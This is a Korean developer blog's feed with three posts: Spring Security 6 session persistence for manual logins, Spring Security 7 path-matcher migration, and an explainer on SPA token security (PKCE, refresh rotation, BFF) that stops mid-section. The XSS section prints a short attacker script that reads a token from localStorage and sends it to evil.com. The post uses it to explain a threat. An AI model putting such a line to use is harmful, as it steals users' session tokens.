codinglog COTHE's technical blog http://thecodinglog.github.io/ Thu, 29 Jan 2026 16:59:00 +0900 Thu, 29 Jan 2026 16:59:00 +0900 Jekyll v3.10.0 Spring Security 6에서 인증 정보가 세션에 저장되지 않는 문제 <h1 id="spring-security-6에서-인증-정보가-세션에-저장되지-않는-문제">Spring Security 6에서 인증 정보가 세션에 저장되지 않는 문제</h1> <p>API에서 직접 로그인 로직을 구현했는데, 인증은 성공하지만 다음 요청에서 인증 정보가 사라지는 경험을 해보셨나요? 이번 포스트에서는 이 문제의 원인과 해결 방법을 정리해보겠습니다.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h2 id="문제-상황">문제 상황</h2> <p>API에서 직접 로그인 로직을 구현했고, 인증도 성공했습니다. 그런데 다음 요청에서 인증 정보가 사라져버렸습니다.</p> <p>콘솔에는 다음과 같은 로그가 찍힙니다.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Did not find SecurityContext in HttpSession ... using the SPRING_SECURITY_CONTEXT session attribute </code></pre></div></div> <p>즉, HttpSession 안에서 SecurityContext를 찾지 못한다는 의미입니다.</p> <h2 id="원인-spring-security-6의-기본-동작-변경">원인: Spring Security 6의 기본 동작 변경</h2> <p>Spring Security 6(Spring Boot 3.x)부터는 SecurityContext 자동 저장이 기본적으로 꺼져 있습니다.</p> <p>정확히 말하면 <code class="language-plaintext highlighter-rouge">requireExplicitSave</code> 기본값이 활성화되어, 개발자가 명시적으로 저장하지 않으면 세션에 남지 않습니다. 이전 버전처럼 <code class="language-plaintext highlighter-rouge">SecurityContextHolder</code>에만 넣으면 세션에는 저장되지 않습니다.</p> <p>이는 Spring Security의 보안 및 성능 개선을 위한 의도적인 변경 사항입니다.</p> <h2 id="formlogin은-왜-문제없을까">formLogin은 왜 문제없을까?</h2> <p>그런데 <code class="language-plaintext highlighter-rouge">formLogin</code>을 사용하면 이런 문제가 발생하지 않습니다. 왜 그럴까요?</p> <p><code class="language-plaintext highlighter-rouge">formLogin</code>을 사용하면 내부 필터들이 다음 단계를 모두 수행하기 때문입니다.</p> <ol> <li><code class="language-plaintext highlighter-rouge">UsernamePasswordAuthenticationFilter</code>가 인증 처리</li> <li>성공 시 SecurityContext 생성</li> <li><code class="language-plaintext highlighter-rouge">SecurityContextPersistenceFilter</code>가 HttpSession에 저장</li> </ol> <p>즉, <code class="language-plaintext highlighter-rouge">formLogin</code>은 인증 이후 세션 저장까지 프레임워크가 자동으로 처리해줍니다.</p> <h2 id="수동-로그인에서-해결-방법">수동 로그인에서 해결 방법</h2> <p>직접 로그인 로직을 구현한 경우에는 명시적 저장이 필요합니다.</p> <p>핵심은 다음 한 줄입니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">securityContextRepository</span><span class="o">.</span><span class="na">saveContext</span><span class="o">(</span><span class="n">context</span><span class="o">,</span> <span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> </code></pre></div></div> <p>이걸 호출해야 <code class="language-plaintext highlighter-rouge">SPRING_SECURITY_CONTEXT</code>가 세션에 들어갑니다.</p> <h3 id="전체-코드-예시">전체 코드 예시</h3> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@RestController</span> <span class="nd">@RequestMapping</span><span class="o">(</span><span class="s">"/api/auth"</span><span class="o">)</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">AuthController</span> <span class="o">{</span> <span class="kd">private</span> <span class="kd">final</span> <span class="nc">AuthenticationManager</span> <span class="n">authenticationManager</span><span class="o">;</span> <span class="kd">private</span> <span class="kd">final</span> <span class="nc">SecurityContextRepository</span> <span class="n">securityContextRepository</span><span class="o">;</span> <span class="kd">public</span> <span class="nf">AuthController</span><span class="o">(</span> <span class="nc">AuthenticationManager</span> <span class="n">authenticationManager</span><span class="o">,</span> <span class="nc">SecurityContextRepository</span> <span class="n">securityContextRepository</span><span class="o">)</span> <span class="o">{</span> <span class="k">this</span><span class="o">.</span><span class="na">authenticationManager</span> <span class="o">=</span> <span class="n">authenticationManager</span><span class="o">;</span> <span class="k">this</span><span class="o">.</span><span class="na">securityContextRepository</span> <span class="o">=</span> <span class="n">securityContextRepository</span><span class="o">;</span> <span class="o">}</span> <span class="nd">@PostMapping</span><span class="o">(</span><span class="s">"/login"</span><span class="o">)</span> <span class="kd">public</span> <span class="nc">ResponseEntity</span><span class="o">&lt;?&gt;</span> <span class="n">login</span><span class="o">(</span> <span class="nd">@RequestBody</span> <span class="nc">LoginRequest</span> <span class="n">loginRequest</span><span class="o">,</span> <span class="nc">HttpServletRequest</span> <span class="n">request</span><span class="o">,</span> <span class="nc">HttpServletResponse</span> <span class="n">response</span><span class="o">)</span> <span class="o">{</span> <span class="c1">// 1. 인증 수행</span> <span class="nc">UsernamePasswordAuthenticationToken</span> <span class="n">token</span> <span class="o">=</span> <span class="k">new</span> <span class="nf">UsernamePasswordAuthenticationToken</span><span class="o">(</span> <span class="n">loginRequest</span><span class="o">.</span><span class="na">getUsername</span><span class="o">(),</span> <span class="n">loginRequest</span><span class="o">.</span><span class="na">getPassword</span><span class="o">()</span> <span class="o">);</span> <span class="nc">Authentication</span> <span class="n">authentication</span> <span class="o">=</span> <span class="n">authenticationManager</span><span class="o">.</span><span class="na">authenticate</span><span class="o">(</span><span class="n">token</span><span class="o">);</span> <span class="c1">// 2. SecurityContext 생성 및 설정</span> <span class="nc">SecurityContext</span> <span class="n">context</span> <span class="o">=</span> <span class="nc">SecurityContextHolder</span><span class="o">.</span><span class="na">createEmptyContext</span><span class="o">();</span> <span class="n">context</span><span class="o">.</span><span class="na">setAuthentication</span><span class="o">(</span><span class="n">authentication</span><span class="o">);</span> <span class="nc">SecurityContextHolder</span><span class="o">.</span><span class="na">setContext</span><span class="o">(</span><span class="n">context</span><span class="o">);</span> <span class="c1">// 3. 세션에 명시적으로 저장 (핵심!)</span> <span class="n">securityContextRepository</span><span class="o">.</span><span class="na">saveContext</span><span class="o">(</span><span class="n">context</span><span class="o">,</span> <span class="n">request</span><span class="o">,</span> <span class="n">response</span><span class="o">);</span> <span class="k">return</span> <span class="nc">ResponseEntity</span><span class="o">.</span><span class="na">ok</span><span class="o">(</span><span class="s">"로그인 성공"</span><span class="o">);</span> <span class="o">}</span> <span class="o">}</span> </code></pre></div></div> <h3 id="securitycontextrepository-빈-설정">SecurityContextRepository 빈 설정</h3> <p><code class="language-plaintext highlighter-rouge">SecurityContextRepository</code>를 주입받으려면 다음과 같이 빈으로 등록해야 합니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Configuration</span> <span class="nd">@EnableWebSecurity</span> <span class="kd">public</span> <span class="kd">class</span> <span class="nc">SecurityConfig</span> <span class="o">{</span> <span class="nd">@Bean</span> <span class="kd">public</span> <span class="nc">SecurityContextRepository</span> <span class="nf">securityContextRepository</span><span class="o">()</span> <span class="o">{</span> <span class="k">return</span> <span class="k">new</span> <span class="nf">HttpSessionSecurityContextRepository</span><span class="o">();</span> <span class="o">}</span> <span class="c1">// ... 나머지 Security 설정</span> <span class="o">}</span> </code></pre></div></div> <h2 id="정리">정리</h2> <p>핵심 내용을 정리하면 다음과 같습니다.</p> <ul> <li>Spring Security 6부터는 SecurityContext가 자동으로 세션에 저장되지 않습니다</li> <li><code class="language-plaintext highlighter-rouge">formLogin</code>은 내부 필터에서 자동 저장하지만, 수동 로그인은 직접 저장해야 합니다</li> <li>해결은 <code class="language-plaintext highlighter-rouge">SecurityContextRepository.saveContext(...)</code> 호출입니다</li> </ul> <h2 id="추가-체크-포인트">추가 체크 포인트</h2> <p>인증 정보가 세션에 제대로 저장되더라도 다음 사항들을 확인해야 합니다.</p> <h3 id="1-쿠키-전송-확인">1. 쿠키 전송 확인</h3> <p>클라이언트는 반드시 <code class="language-plaintext highlighter-rouge">JSESSIONID</code> 쿠키를 다음 요청에 포함해야 합니다.</p> <p>브라우저는 기본적으로 쿠키를 자동으로 포함하지만, Postman이나 axios 같은 클라이언트를 사용할 때는 명시적으로 쿠키 전송을 설정해야 합니다.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// axios 예시</span> <span class="nx">axios</span><span class="p">.</span><span class="nx">post</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/auth/login</span><span class="dl">'</span><span class="p">,</span> <span class="nx">credentials</span><span class="p">,</span> <span class="p">{</span> <span class="na">withCredentials</span><span class="p">:</span> <span class="kc">true</span> <span class="c1">// 쿠키 포함</span> <span class="p">});</span> </code></pre></div></div> <h3 id="2-세션-저장소">2. 세션 저장소</h3> <p>기본 세션 저장소는 서버 메모리(톰캣 세션)입니다.</p> <p>이는 다음과 같은 한계가 있습니다.</p> <ul> <li>서버 재시작 시 세션 소멸</li> <li>다중 서버 환경에서 세션 공유 불가</li> </ul> <h3 id="3-분산-환경-고려">3. 분산 환경 고려</h3> <p>분산 환경이라면 Spring Session + Redis 같은 외부 세션 저장소를 고려해야 합니다.</p> <div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">&lt;!-- pom.xml --&gt;</span> <span class="nt">&lt;dependency&gt;</span> <span class="nt">&lt;groupId&gt;</span>org.springframework.session<span class="nt">&lt;/groupId&gt;</span> <span class="nt">&lt;artifactId&gt;</span>spring-session-data-redis<span class="nt">&lt;/artifactId&gt;</span> <span class="nt">&lt;/dependency&gt;</span> </code></pre></div></div> <div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># application.yml</span> <span class="na">spring</span><span class="pi">:</span> <span class="na">session</span><span class="pi">:</span> <span class="na">store-type</span><span class="pi">:</span> <span class="s">redis</span> </code></pre></div></div> <p>이렇게 하면 여러 서버 인스턴스 간에 세션을 공유할 수 있습니다.</p> <h2 id="마무리">마무리</h2> <p>Spring Security 6의 변경사항은 명시적 보안 관리를 권장하는 방향입니다. 처음에는 불편할 수 있지만, 이를 통해 개발자가 세션 관리를 더 명확하게 제어할 수 있게 되었습니다.</p> <p>수동 로그인을 구현할 때는 반드시 <code class="language-plaintext highlighter-rouge">SecurityContextRepository.saveContext()</code>를 호출하는 것을 잊지 마세요!</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Thu, 29 Jan 2026 16:50:00 +0900 http://thecodinglog.github.io/spring/security/2026/01/29/spring-security-security-context.html http://thecodinglog.github.io/spring/security/2026/01/29/spring-security-security-context.html Spring Security Security Context Spring Security Spring Security 7.0 경로 매칭 변경 사항 정리 <h1 id="spring-security-70-경로-매칭-변경-사항-정리">Spring Security 7.0 경로 매칭 변경 사항 정리</h1> <p>Spring Security 7.0으로 업그레이드하면서 기존 코드가 동작하지 않아 당황하셨나요? 바로 경로 매칭 방식이 변경되었기 때문입니다. 이번 포스트에서는 무엇이 바뀌었고, 어떻게 수정해야 하는지 정리해보겠습니다.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> <h2 id="무엇이-바뀌었나">무엇이 바뀌었나?</h2> <p>Spring Security 7.0부터는 URL 매칭 방식에 큰 변화가 있었습니다. 기존에 사용하던 <code class="language-plaintext highlighter-rouge">AntPathRequestMatcher</code>와 <code class="language-plaintext highlighter-rouge">MvcRequestMatcher</code>가 제거되고, <code class="language-plaintext highlighter-rouge">PathPatternRequestMatcher</code>로 대체되었습니다.</p> <h3 id="제거된-matcher">제거된 Matcher</h3> <ul> <li><code class="language-plaintext highlighter-rouge">AntPathRequestMatcher</code></li> <li><code class="language-plaintext highlighter-rouge">MvcRequestMatcher</code></li> </ul> <h3 id="새롭게-추가된-matcher">새롭게 추가된 Matcher</h3> <ul> <li><code class="language-plaintext highlighter-rouge">PathPatternRequestMatcher</code></li> </ul> <h2 id="왜-바뀌었을까">왜 바뀌었을까?</h2> <p>이러한 변경에는 몇 가지 이유가 있습니다.</p> <p>첫째, Spring Framework 5.3부터 도입된 PathPatternParser 기반으로 URL 매칭 성능을 최적화하기 위함입니다. 기존 Ant 방식보다 더 빠르고 효율적인 매칭이 가능해졌습니다.</p> <p>둘째, URL 패턴 문법을 통일하고 더 명확하게 처리하기 위해서입니다. 이제 Spring Security는 기본적으로 PathPatternRequestMatcher 방식으로 경로를 매칭합니다.</p> <h2 id="코드-수정-방법">코드 수정 방법</h2> <p>그렇다면 기존 코드를 어떻게 수정해야 할까요? 두 가지 방법이 있습니다.</p> <h3 id="방법-a-pathpatternrequestmatcher-사용-권장">방법 A: PathPatternRequestMatcher 사용 (권장)</h3> <p>가장 명시적이고 공식적인 방식입니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">org.springframework.security.web.servlet.util.matcher.PathPatternRequestMatcher</span><span class="o">;</span> <span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">20</span><span class="o">)</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">apiAdminSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="c1">// 수정됨: AntPathRequestMatcher → PathPatternRequestMatcher</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="nc">PathPatternRequestMatcher</span><span class="o">.</span><span class="na">pathPattern</span><span class="o">(</span><span class="s">"/api/**"</span><span class="o">))</span> <span class="o">.</span><span class="na">csrf</span><span class="o">(</span><span class="nl">AbstractHttpConfigurer:</span><span class="o">:</span><span class="n">disable</span><span class="o">)</span> <span class="o">.</span><span class="na">cors</span><span class="o">(</span><span class="nc">Customizer</span><span class="o">.</span><span class="na">withDefaults</span><span class="o">());</span> <span class="c1">// ... (나머지 설정 동일)</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <h3 id="방법-b-문자열-패턴-직접-사용-더-간결">방법 B: 문자열 패턴 직접 사용 (더 간결)</h3> <p><code class="language-plaintext highlighter-rouge">HttpSecurity.securityMatcher(String... patterns)</code>는 내부적으로 <code class="language-plaintext highlighter-rouge">PathPatternRequestMatcher</code>를 사용하도록 변경되었습니다. 따라서 객체를 직접 생성하지 않고 문자열만 넘겨도 됩니다.</p> <div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@Bean</span> <span class="nd">@Order</span><span class="o">(</span><span class="mi">20</span><span class="o">)</span> <span class="kd">public</span> <span class="nc">SecurityFilterChain</span> <span class="nf">apiAdminSecurityFilterChain</span><span class="o">(</span><span class="nc">HttpSecurity</span> <span class="n">http</span><span class="o">)</span> <span class="kd">throws</span> <span class="nc">Exception</span> <span class="o">{</span> <span class="n">http</span> <span class="c1">// 수정됨: 문자열 패턴 전달 (내부적으로 PathPatternRequestMatcher 사용)</span> <span class="o">.</span><span class="na">securityMatcher</span><span class="o">(</span><span class="s">"/api/**"</span><span class="o">)</span> <span class="o">.</span><span class="na">csrf</span><span class="o">(</span><span class="nl">AbstractHttpConfigurer:</span><span class="o">:</span><span class="n">disable</span><span class="o">);</span> <span class="c1">// ...</span> <span class="k">return</span> <span class="n">http</span><span class="o">.</span><span class="na">build</span><span class="o">();</span> <span class="o">}</span> </code></pre></div></div> <p><code class="language-plaintext highlighter-rouge">/api/**</code>처럼 단순한 패턴은 방법 B가 가장 깔끔합니다.</p> <h2 id="pathpattern-문법-주의사항">PathPattern 문법 주의사항</h2> <p>PathPattern은 Ant 스타일과 유사하지만 문법이 더 엄격합니다. 특히 <code class="language-plaintext highlighter-rouge">**</code> (이중 와일드카드) 사용 시 주의해야 합니다.</p> <h3 id="-규칙"><code class="language-plaintext highlighter-rouge">**</code> 규칙</h3> <p>이중 와일드카드는 <strong>반드시 패턴의 맨 끝에서만 사용 가능</strong>합니다.</p> <table> <thead> <tr> <th>패턴</th> <th>가능 여부</th> </tr> </thead> <tbody> <tr> <td><code class="language-plaintext highlighter-rouge">/api/**</code></td> <td>✅ 가능</td> </tr> <tr> <td><code class="language-plaintext highlighter-rouge">/api/**/details</code></td> <td>❌ 불가능</td> </tr> </tbody> </table> <p>만약 <code class="language-plaintext highlighter-rouge">/api/**/details</code> 같은 중간 와일드카드가 필요하다면 <code class="language-plaintext highlighter-rouge">RegexRequestMatcher</code> 사용을 고려해야 합니다.</p> <h2 id="정리">정리</h2> <p>Spring Security 7.0으로 업그레이드할 때 기억해야 할 핵심 사항은 다음과 같습니다.</p> <ul> <li><code class="language-plaintext highlighter-rouge">AntPathRequestMatcher</code>는 더 이상 사용할 수 없습니다</li> <li><code class="language-plaintext highlighter-rouge">PathPatternRequestMatcher</code>가 공식 대체 방식입니다</li> <li>단순 패턴(<code class="language-plaintext highlighter-rouge">/api/**</code>)은 문자열 방식이 가장 간단하고 권장됩니다</li> <li><code class="language-plaintext highlighter-rouge">**</code>는 패턴의 맨 끝에서만 사용 가능하므로 주의가 필요합니다</li> </ul> <p>마이그레이션 과정에서 이 내용을 참고하시면 큰 어려움 없이 업그레이드하실 수 있을 것입니다.</p> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> Thu, 29 Jan 2026 16:40:00 +0900 http://thecodinglog.github.io/spring/security/2026/01/29/spring-security7-url-matcher.html http://thecodinglog.github.io/spring/security/2026/01/29/spring-security7-url-matcher.html Spring Security Url Matcher Spring Security SPA 보안 아키텍처 | 토큰을 브라우저에 두지 말아야 하는 이유 🔐 <p>SPA(Single Page Application) 개발하면서 “토큰을 LocalStorage에 저장할까, 쿠키에 저장할까?” 고민해보신 적 있으신가요? 아니면 “PKCE가 뭔데 꼭 써야 하나?” 싶으셨다면, 이 글이 답입니다. 2026년 현재, 웹 보안의 가장 뜨거운 감자인 SPA 인증/인가 문제를 한 방에 정리했습니다.</p> <hr /> <script async="" src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- 컨텐츠내 --> <p><ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3234744071843247" data-ad-slot="1671969273" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script> —</p> <h1 id="왜-spa는-보안이-어려운가">왜 SPA는 보안이 어려운가?</h1> <h2 id="신뢰-경계가-무너졌다">신뢰 경계가 무너졌다</h2> <p>전통적인 웹 애플리케이션은 간단했습니다. 서버가 HTML을 렌더링하고, 브라우저는 그냥 보여주기만 하면 됐죠. 세션 정보는 서버 메모리에 안전하게 보관되고, 클라이언트는 단순한 세션 ID 쿠키만 들고 있으면 됐습니다.</p> <p>그런데 SPA는 다릅니다. 비즈니스 로직이 브라우저로 넘어왔고, 상태 관리도 클라이언트에서 합니다. React나 Vue로 화려한 UI를 만들 수 있게 됐지만, 보안 관점에서는 재앙이었습니다. <strong>브라우저라는 신뢰할 수 없는 환경에 민감한 인증 토큰을 보관해야 하는</strong> 상황이 된 겁니다.</p> <h2 id="퍼블릭-클라이언트의-딜레마">퍼블릭 클라이언트의 딜레마</h2> <p>OAuth 2.0 표준은 클라이언트를 두 가지로 분류합니다.</p> <p><strong>기밀 클라이언트(Confidential Client):</strong> 서버에서 실행되는 애플리케이션입니다. <code class="language-plaintext highlighter-rouge">client_secret</code>을 안전하게 보관할 수 있죠. 예를 들어 Node.js 백엔드나 Spring Boot 서버가 여기 해당합니다.</p> <p><strong>퍼블릭 클라이언트(Public Client):</strong> 사용자 디바이스에서 실행되는 애플리케이션입니다. SPA, 모바일 앱, 데스크톱 앱이 여기 속합니다. 코드가 사용자에게 노출되므로 비밀키를 가질 수 없습니다.</p> <p>SPA는 JavaScript 코드가 브라우저에서 그대로 실행되므로 태생적으로 퍼블릭 클라이언트입니다. 개발자 도구만 열면 모든 코드가 보이는데, 여기에 <code class="language-plaintext highlighter-rouge">client_secret</code>을 하드코딩한다? 그건 GitHub에 비밀번호 커밋하는 것과 다를 바 없습니다.</p> <hr /> <h1 id="퍼블릭-클라이언트가-직면한-위협들">퍼블릭 클라이언트가 직면한 위협들</h1> <h2 id="1-클라이언트-사칭-client-impersonation">1. 클라이언트 사칭 (Client Impersonation)</h2> <p>기밀 클라이언트는 <code class="language-plaintext highlighter-rouge">client_secret</code>으로 자신의 신원을 증명합니다. 하지만 퍼블릭 클라이언트는 이게 불가능합니다. 만약 실수로 SPA 코드에 <code class="language-plaintext highlighter-rouge">client_secret</code>을 포함했다면? 공격자는 개발자 도구로 이를 추출해서 정상 앱인 척 사칭할 수 있습니다.</p> <p>이게 왜 문제냐면, 공격자가 사용자 데이터를 낚아채거나(피싱), 부정한 토큰을 마음대로 발급받을 수 있기 때문입니다. 그래서 IETF와 OWASP는 퍼블릭 클라이언트에서 Client Credentials Grant 방식을 <strong>절대 사용하지 말라</strong>고 못 박고 있습니다.</p> <h2 id="2-암시적-흐름implicit-flow의-몰락">2. 암시적 흐름(Implicit Flow)의 몰락</h2> <p>과거 SPA 개발 초기에는 Implicit Flow가 인기였습니다. 인증 코드 교환 단계를 생략하고, URL 해시(<code class="language-plaintext highlighter-rouge">#</code>)에 토큰을 바로 담아 전달하는 방식이었죠.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://myapp.com/callback#access_token=eyJhbG... </code></pre></div></div> <p>간단해 보이지만 치명적인 결함이 있었습니다:</p> <ul> <li><strong>토큰 유출:</strong> URL에 포함된 토큰은 브라우저 히스토리, 프록시 로그, Referer 헤더를 통해 제3자에게 노출됩니다</li> <li><strong>재발급 불가:</strong> 보안상 리프레시 토큰을 주지 않으므로, 액세스 토큰 만료 시마다 재인증이 필요합니다</li> <li><strong>서드파티 쿠키 차단:</strong> iframe을 이용한 사일런트 갱신이 ITP(Intelligent Tracking Prevention) 정책으로 막혔습니다</li> </ul> <p>그래서 2026년 현재, Implicit Flow는 완전히 퇴출되었습니다. OAuth 2.1 표준에서 아예 삭제됐죠.</p> <h2 id="3-xss-가장-무서운-적">3. XSS: 가장 무서운 적</h2> <p>퍼블릭 클라이언트의 최대 위협은 <strong>XSS(Cross-Site Scripting)</strong> 공격입니다. SPA는 수많은 npm 패키지와 CDN 스크립트에 의존합니다. 이 중 하나만 감염되거나 코드에 취약점이 있으면, 공격자는 악성 스크립트를 실행해서 토큰을 탈취할 수 있습니다.</p> <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// 공격자의 악성 스크립트</span> <span class="kd">const</span> <span class="nx">token</span> <span class="o">=</span> <span class="nx">localStorage</span><span class="p">.</span><span class="nx">getItem</span><span class="p">(</span><span class="dl">'</span><span class="s1">access_token</span><span class="dl">'</span><span class="p">);</span> <span class="nx">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://evil.com/steal</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">method</span><span class="p">:</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="na">body</span><span class="p">:</span> <span class="nx">JSON</span><span class="p">.</span><span class="nx">stringify</span><span class="p">({</span> <span class="nx">token</span> <span class="p">})</span> <span class="p">});</span> </code></pre></div></div> <p>서버 사이드 세션과 달리, JWT 같은 토큰은 그 자체로 권한을 가지고 있습니다. 탈취되는 순간 공격자는 사용자인 척 모든 API를 마음대로 호출할 수 있습니다.</p> <hr /> <h1 id="해결책-1-pkce-기반-authorization-code-flow">해결책 1: PKCE 기반 Authorization Code Flow</h1> <p>별도 백엔드 없이 S3나 CDN에 정적 호스팅하는 SPA라면, 브라우저 단독으로 인증을 처리해야 합니다. 이때의 유일한 표준은 <strong>PKCE(Proof Key for Code Exchange)</strong>가 적용된 Authorization Code Flow입니다.</p> <h2 id="pkce가-뭔데">PKCE가 뭔데?</h2> <p>PKCE(발음: 피씨)는 원래 모바일 앱을 위해 만들어졌지만, 지금은 모든 퍼블릭 클라이언트의 표준입니다. 핵심은 <strong>동적 비밀</strong>을 만들어 인증 코드를 보호하는 겁니다.</p> <h3 id="동작-과정">동작 과정</h3> <ol> <li><strong>Code Verifier 생성:</strong> 클라이언트가 암호학적으로 안전한 난수를 생성합니다 <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">codeVerifier</span> <span class="o">=</span> <span class="nx">generateRandomString</span><span class="p">(</span><span class="mi">128</span><span class="p">);</span> </code></pre></div> </div> </li> <li><strong>Code Challenge 도출:</strong> Verifier를 SHA-256으로 해싱합니다 <div class="language-javascript highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">const</span> <span class="nx">codeChallenge</span> <span class="o">=</span> <span class="nx">base64url</span><span class="p">(</span><span class="nx">sha256</span><span class="p">(</span><span class="nx">codeVerifier</span><span class="p">));</span> </code></pre></div> </div> </li> <li><strong>인증 요청:</strong> Challenge를 인증 서버로 보냅니다 <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/authorize?code_challenge=E9M...&amp;code_challenge_method=S256 </code></pre></div> </div> </li> <li><strong>토큰 교환:</strong> 인증 코드를 받은 후, 원본 Verifier를 함께 보냅니다 <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/token?code=abc123&amp;code_verifier=원본난수 </code></pre></div> </div> </li> <li><strong>검증:</strong> 서버가 Verifier를 해싱해서 처음 받은 Challenge와 비교합니다</li> </ol> <h3 id="왜-안전한가">왜 안전한가?</h3> <p>공격자가 리다이렉트 과정에서 인증 코드를 가로챈다고 해도 소용없습니다. 토큰으로 교환하려면 원본 <code class="language-plaintext highlighter-rouge">code_verifier</code>가 필요한데, 이건 해시의 역상 저항성 때문에 복원이 불가능합니다. <strong>공격자는 코드를 가졌어도 토큰을 못 받는 겁니다.</strong></p> <h2 id="pkce의-한계와-리프레시-토큰-로테이션">PKCE의 한계와 리프레시 토큰 로테이션</h2> <p>PKCE는 인증 코드를 보호하지만, 결국 발급받은 토큰은 브라우저에 저장해야 합니다. XSS 공격 위험은 여전히 존재하죠. 이를 보완하기 위해 <strong>리프레시 토큰 로테이션(Refresh Token Rotation)</strong>이 필수입니다.</p> <p><strong>작동 방식:</strong></p> <ul> <li>리프레시 토큰을 일회용으로 만듭니다</li> <li>액세스 토큰 갱신할 때마다 새 리프레시 토큰을 발급하고, 이전 토큰은 즉시 폐기합니다</li> <li>만약 이미 사용된 토큰으로 갱신을 시도하면? 서버는 <strong>“토큰이 탈취됐다!”</strong>고 판단하고 해당 토큰 계열을 모두 무효화합니다</li> </ul> <p>공격자뿐만 아니라 정상 사용자도 로그아웃되지만, 공격의 지속성을 차단하는 강력한 방어책입니다.</p> <hr /> <h1 id="해결책-2-bff-backend-for-frontend-패턴">해결책 2: BFF (Backend for Frontend) 패턴</h1> <p>IETF와 보안 전문가들이 <strong>강력하게 권장</strong>하는 최상의 아키텍처입니다. 철학은 단순합니다:</p> <p><strong>“브라우저에는 토큰을 두지 않는다(No Tokens in the Browser)”</strong></p> <h2 id="bff-아키텍처-이해하기">BFF 아키텍처 이해하기</h2> <p>BFF는 SPA와 API 서버 사이에 전용 백엔드를 배치합니다. 이 백엔드는 Node.js, .NET, Java 등으로 구현된 경량 서버일 수도 있고, API 게이트웨이 플러그인일 수도 있습니다.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[Browser] ←→ [BFF] ←→ [Auth Server] ↓ [API Server] </code></pre></div></div> <h3 id="동작-흐름">동작 흐름</h3> <ol> <li> <p><strong>기밀 클라이언트 전환:</strong> BFF는 서버 환경에서 동작하므로 <code class="language-plaintext highlighter-rouge">client_secret</code>을 안전하게 관리할 수 있습니다</p> </li> <li> <p><strong>토큰의 은닉:</strong> 사용자가 로그인하면, BFF가 인증 서버와 통신해서 토큰을 받습니다. <strong>중요한 건 이 토큰들이 절대 브라우저로 전송되지 않는다는 겁니다.</strong> 토큰은 BFF의 메모리, Redis, 또는 암호화된 쿠키에만 저장됩니다.</p> </li> <li> <p><strong>세션 쿠키 발급:</strong> BFF는 SPA에게 토큰 대신, <code class="language-plaintext highlighter-rouge">HttpOnly</code>, <code class="language-plaintext highlighter-rouge">Secure</code>, <code class="language-plaintext highlighter-rouge">SameSite</code> 속성이 적용된 세션 쿠키를 줍니다. 이 쿠키는 단순 식별자일 뿐이며, JWT payload 같은 건 없습니다.</p> </li> <li> <p><strong>프록시 역할:</strong> SPA가 API를 호출할 때 쿠키를 BFF로 보내면, BFF가 쿠키를 검증하고 실제 액세스 토큰을 찾아 API 요청의 <code class="language-plaintext highlighter-rouge">Authorization</code> 헤더에 주입해서 전달합니다.</p> 